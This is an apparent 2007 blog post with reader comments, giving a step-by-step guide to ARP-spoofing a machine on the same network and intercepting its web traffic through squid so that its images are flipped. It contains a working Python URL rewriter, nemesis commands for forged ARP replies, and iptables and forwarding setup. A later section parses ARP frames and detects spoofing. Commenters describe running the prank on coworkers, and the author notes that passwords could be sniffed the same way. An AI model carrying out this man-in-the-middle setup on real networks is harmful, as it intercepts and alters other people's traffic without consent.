
Fun with squid, imagemagick, and ARP spoofing
Posted by johns on Tue 18 Sep 2007 at 21:06

The idea comes from http://www.ex-parrot.com/~pete/upside-down-ternet.html, which describes how to have fun with wireless freeloaders by flipping every image their browser requests (there's a screenshot on that page).
In this article I'm going to do it a different way: instead of modifying the gateway, I use ARP spoofing (also called ARP poisoning) to trick the target box into believing that my box is the gateway, so that its traffic flows through me.
(This article assumes that the attacker and the target are on the same private network, i.e. the same Ethernet or wireless segment; ARP does not cross routers.)

What are ARP and ARP spoofing anyway?
ARP, the Address Resolution Protocol, maps IPv4 addresses to Ethernet MAC addresses on the local link.
The kernel keeps an ARP cache, which you can list by typing /usr/sbin/arp (or arp -n). When a host needs to reach an IP address that isn't in the cache, it broadcasts an ARP request ("who has <IP>? tell <my IP>"). The host that owns that address answers with an ARP reply ("<IP> is at <MAC>"), and the requester caches the mapping.
ARP has no authentication and no state: most stacks update an existing cache entry whenever a reply arrives, whether they asked for it or not, so anyone on the segment can send a forged reply at any time and overwrite the victim's entry for the gateway.

For better and more complete descriptions:
http://en.wikipedia.org/wiki/Address_Resolution_Protocol
http://en.wikipedia.org/wiki/ARP_spoofing

Let's start by installing some prerequisites.
If you already have an HTTP server installed, or if you don't want to use thttpd, remove it from the command below.
# apt-get install squid nemesis imagemagick thttpd

Squid is a caching HTTP proxy that has the nice feature of letting one define an external program to rewrite URLs. Nemesis will be used for sending fake ARP replies, imagemagick (mogrify) for transforming images, and thttpd for serving the transformed images back to squid.

# nano /usr/local/bin/squidupsidedown

Copy and paste the following code:


#!/usr/bin/env python
# Squid URL rewriter (Python 2, as in the original): reads one request per
# line on stdin and writes the (possibly rewritten) URL back on stdout.
import os, sys
import urllib, re, subprocess

outdir = '/var/www/squidupsidedown'            # directory served by thttpd
wwwpath = 'http://localhost/squidupsidedown'   # URL prefix squid will fetch instead
# Image extension at the very end of the URL. The dot must be escaped: an
# unescaped '.' matches any character, so e.g. '/ajpg' would count as an image.
img_regex = re.compile(r'(?i)\.(jpg|jpeg|png|gif)$')
operation = '-flip' # mogrify -help for more options
operation = operation.split()
count = 0
while True:
        try:
                line = raw_input()
        except EOFError:
                # squid closed our stdin (shutdown or restart): exit cleanly
                break
        # squid passes "URL client_ip/fqdn ident method"; we only need the URL
        url = line.split(' ')[0]
        m = img_regex.search(url)
        if m:
                # unique name per rewriter process and per request
                outname = '%d-%d.%s' % (os.getpid(), count, m.group(1))
                outpath = os.path.join(outdir, outname)
                count += 1
                try:
                        urllib.urlretrieve(url, outpath)
                        os.chmod(outpath, 0644)
                        # transform in place; if mogrify fails, serve the original
                        if subprocess.call(['mogrify'] + operation + [outpath]) == 0:
                                print '/'.join([wwwpath, outname])
                        else:
                                print url
                except (IOError, urllib.ContentTooShortError):
                        print url
        else:
                print url
        # squid waits for a complete line, so never leave it buffered
        sys.stdout.flush()

Save the file.

# chmod +x /usr/local/bin/squidupsidedown
# mkdir /var/www/squidupsidedown
# chown proxy /var/www/squidupsidedown

squidupsidedown is a simple squid URL rewriter. Squid runs the url_rewrite_program as a long-lived child, feeds it one request per line on stdin (the URL first, followed by the client address, ident and request method) and expects exactly one line back on stdout for each request: either the unchanged URL or the URL to fetch instead. Squid starts it as the proxy user, which is why the output directory above is chowned to proxy.
In this case, if the URL ends in .jpg/.jpeg/.png/.gif, it is assumed to be an image: the script downloads it into /var/www/squidupsidedown, transforms it in place with mogrify and hands squid the URL http://localhost/squidupsidedown/pid-count.ext, which thttpd serves. Anything else, and any image that fails to download or convert, is passed through untouched.
By default images are flipped, but any operation supported by mogrify (see mogrify -help) can be used. Bear in mind that mogrify is decoding whatever image the target happened to request, with the privileges of the proxy user, so don't run this on a box you care about.

We have to make a few changes to squid.

# nano /etc/squid/squid.conf
Around line 73:

http_port 3128 transparent

This enables transparent (intercepting) proxying on port 3128. The keyword is transparent in squid 2.x; squid 3.1 and later spell it intercept.

Around line 2577 (substitute 192.168.26.0/24 with your network):

acl our_networks src 192.168.26.0/24
http_access allow our_networks

Both lines must come before the default http_access deny all, otherwise the target just gets an access-denied page instead of its images.

Around line 1464:

url_rewrite_program /usr/local/bin/squidupsidedown

Restart squid.

# invoke-rc.d squid restart

Enable IP forwarding in the kernel. This is necessary so that our box works as a gateway for the target's non-HTTP traffic as well, instead of silently dropping it (which the target would notice immediately). Because the box will then be forwarding packets back out of the same interface they came in on, it will also send ICMP redirects telling the target to use the real gateway directly; turn those off too (one of the comments below shows how, via send_redirects under /proc/sys/net/ipv4/conf/).

# echo 1 > /proc/sys/net/ipv4/ip_forward

Enable transparent proxying: redirect TCP port 80 traffic arriving on eth0 into squid. Substitute eth0 with the appropriate network interface. Since this is a PREROUTING rule it only touches packets coming in from the target; the rewriter's own downloads are locally generated and go straight out, so there is no loop.

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

With all the setup completed, it's time for the attack itself. Define the variables below, where my_macaddr is the MAC address of your (attacking) box, gw_ipaddr is the IP address of the gateway/router, target_macaddr is the MAC address of the target, and target_ipaddr is the IP address of the target. (A MAC address is six octets; the values below are placeholders.)

my_macaddr=00:11:22:33:44:55
gw_ipaddr=192.168.26.1
target_macaddr=00:66:55:44:33:22
target_ipaddr=192.168.26.103

To get these you can:
* nmap the network, you have to be root to see MAC addresses:
# nmap 192.168.26.1-
* Or if you know the IP address of the target:
$ ping -c 1 192.168.26.103; /usr/sbin/arp

To get your own MAC address type /sbin/ifconfig.

Send a spoofed ARP reply. For more information on the arguments, type nemesis arp help. Again, substitute eth0 with the appropriate network interface.

# nemesis arp -S $gw_ipaddr -D $target_ipaddr -h $my_macaddr -m $target_macaddr -r -d eth0 -H $my_macaddr -M $target_macaddr

The target's ARP entry for the gateway will expire after a while, or be overwritten by a genuine reply from the router, so the command above has to be repeated every few seconds (put it in a shell loop with a short sleep).
On the target, type /usr/sbin/arp (Linux) or arp -a (Windows). If it worked, you should see your own MAC address listed for the gateway's IP instead of the router's MAC address.
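As an added example (Python 3; not code from the original post), here is what the frame sent by the nemesis command above looks like at the byte level, together with the simplest defence the ARP spoofing article linked earlier alludes to: a watcher that remembers which MAC answers for each IP and reports when the gateway's address suddenly changes, the way arpwatch or a static ARP entry would catch this. The IP and MAC values are the placeholders used in this article; the router's real MAC 00:aa:bb:cc:dd:ee and the three-frame capture in demo() are constructed for the example. The field order follows RFC 826; the mapping of the nemesis options onto those fields (-S/-h sender, -D/-m target, -H/-M Ethernet header) is taken from nemesis arp help.

```python
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    """'00:11:22:33:44:55' -> 6 raw bytes; rejects malformed addresses."""
    octets = mac.split(':')
    if len(octets) != 6:
        raise ValueError('a MAC address has exactly 6 octets: %r' % mac)
    return bytes(int(o, 16) for o in octets)


def ip_bytes(ip: str) -> bytes:
    octets = [int(o) for o in ip.split('.')]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError('bad IPv4 address: %r' % ip)
    return bytes(octets)


def mac_str(b: bytes) -> str:
    return ':'.join('%02x' % x for x in b)


def ip_str(b: bytes) -> str:
    return '.'.join(str(x) for x in b)


def build_arp(op: int, sender_mac: str, sender_ip: str,
              target_mac: str, target_ip: str, eth_dst: Optional[str] = None) -> bytes:
    """Ethernet II frame carrying an RFC 826 ARP packet (42 bytes before padding)."""
    eth = mac_bytes(eth_dst or target_mac) + mac_bytes(sender_mac) + struct.pack('!H', ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack('!HHBBH', 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)   # "sender_ip is at sender_mac"
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)   # who the packet is addressed to
    return eth + arp


def nemesis_frame(my_mac: str, gw_ip: str, target_mac: str, target_ip: str) -> bytes:
    """The reply the article's nemesis command sends:
    -S gw_ip -D target_ip -h my_mac -m target_mac -r -H my_mac -M target_mac."""
    return build_arp(ARP_REPLY, my_mac, gw_ip, target_mac, target_ip, eth_dst=target_mac)


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet/ARP frame; None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack('!H', frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack('!HHBBH', frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return {'eth_dst': mac_str(frame[0:6]), 'eth_src': mac_str(frame[6:12]), 'op': op,
            'sender_mac': mac_str(body[0:6]), 'sender_ip': ip_str(body[6:10]),
            'target_mac': mac_str(body[10:16]), 'target_ip': ip_str(body[16:20])}


def detect_spoofing(frames: List[bytes], trusted: Dict[str, str]) -> List[str]:
    """arpwatch-style check: learn IP -> MAC from every ARP packet seen and report
    when an already known IP (pre-seeded from `trusted`, e.g. the router) is
    claimed by a different MAC. Requests count too: they carry a sender pair."""
    table = {ip: mac.lower() for ip, mac in trusted.items()}
    alerts = []
    for i, frame in enumerate(frames):
        p = parse_arp(frame)
        if p is None or p['sender_ip'] == '0.0.0.0':   # skip non-ARP and ARP probes
            continue
        ip, mac = p['sender_ip'], p['sender_mac'].lower()
        known = table.setdefault(ip, mac)               # first sighting is learned, never overwritten
        if known != mac:
            alerts.append('frame %d: %s moved from %s to %s (op=%d)' % (i, ip, known, mac, p['op']))
    return alerts


def demo() -> List[str]:
    """Constructed capture: the target resolves the gateway, the real router answers,
    then the attacker's forged reply arrives. Only the last frame should be reported."""
    gw_ip, gw_mac = '192.168.26.1', '00:aa:bb:cc:dd:ee'        # gw_mac is made up for the demo
    my_mac = '00:11:22:33:44:55'
    target_ip, target_mac = '192.168.26.103', '00:66:55:44:33:22'
    frames = [
        build_arp(ARP_REQUEST, target_mac, target_ip, '00:00:00:00:00:00', gw_ip,
                  eth_dst='ff:ff:ff:ff:ff:ff'),                    # "who has gw_ip? tell target_ip"
        build_arp(ARP_REPLY, gw_mac, gw_ip, target_mac, target_ip),  # genuine answer from the router
        nemesis_frame(my_mac, gw_ip, target_mac, target_ip),         # the spoofed reply
    ]
    return detect_spoofing(frames, {gw_ip: gw_mac})


if __name__ == '__main__':
    for line in demo():
        print(line)
```

Run with python3 and it prints the single alert for the forged frame. In practice you would feed detect_spoofing() frames read from a raw AF_PACKET socket or a pcap, and seed trusted with the router's real MAC; a static ARP entry for the gateway on the target (arp -s) is the blunt version of the same idea, since it stops the forged reply from being cached at all.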

When testing remember that the browser caches images. If it doesn't appear to work, visit another page or clear the cache.

Screenshot: http://gethome.no/~jskogtv/dillo_grml.png

(This is my first post on debian-administration, so a brief introduction: My name is John, I'm 19 and a Linux user since 2002. This site has been very useful to me on multiple occasions, and hopefully this will be useful or at least entertaining to someone. Comments are welcome.)

 

Comments on this Entry

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (71.241.xx.xx) on Wed 19 Sep 2007 at 01:37
I Like !


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by GhostR (217.237.xx.xx) on Wed 19 Sep 2007 at 07:39
DUDE! Don't do this to me! I have to work! I've got so much crap to do (guess it has to wait)! OK, I'll screw with my coworkers a little while I eat breakfast! I never had the idea of flipping pictures! How cool is that!
Nice one!


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by GhostR (217.237.xx.xx) on Wed 19 Sep 2007 at 08:59
OK, this is freaking funny as hell! I've got coworkers calling, complaining that the pictures on their monitors seem blurry (-blur 4) or that images are getting flipped!
I'm having a good time! I love my job! (Can't wait for my boss!)
Thanks for that fun howto again!


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by johns (84.208.xx.xx) on Wed 19 Sep 2007 at 14:43

I should add that part of the point of the post was pointing out the security implications. It is basically a man-in-the-middle attack, and instead of flipping images I could be sniffing passwords - e.g. an SSL connection without certificate verification. The wikipedia article on ARP spoofing suggests a few defenses.


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by ajt (204.193.xx.xx) on Thu 27 Sep 2007 at 13:45
While this is very funny, it's also serious.

I tend to believe that a lot of people get what they deserve, but at the same time a man-in-the-middle attack relying on your neighbours' ignorance could still get you into trouble with the law...

I don't run a wireless network at home; I use a proper switched network and cables. On one friend's visit their notebook picked up five open networks covering the house, three of them with good strong signal strength.

--
"It's Not Magic, It's Work"
Adam


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (80.69.xx.xx) on Fri 21 Sep 2007 at 09:34
Nice idea! I will plug this into our squid next 1 April ;-]

thx
7horsten


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (140.105.xx.xx) on Thu 2 Apr 2009 at 09:27
it's also useful to disable redirects

for f in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $f; done;


Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (174.46.xx.xx) on Fri 30 Oct 2009 at 16:45
The idea is a great prank for Halloween :)
my "finishing touches":

import random  # needed for random.choice below

operations = ['-posterize 5', '-polaroid 10', '-negate', '-implode 5', '-monochrome', '-flip', '-flop', '-transverse', '-swirl 90', '-transpose', '-blur 4'] # mogrify -help for more options

# pick a different transformation for every image
operation = random.choice(operations)
operation = operation.split()
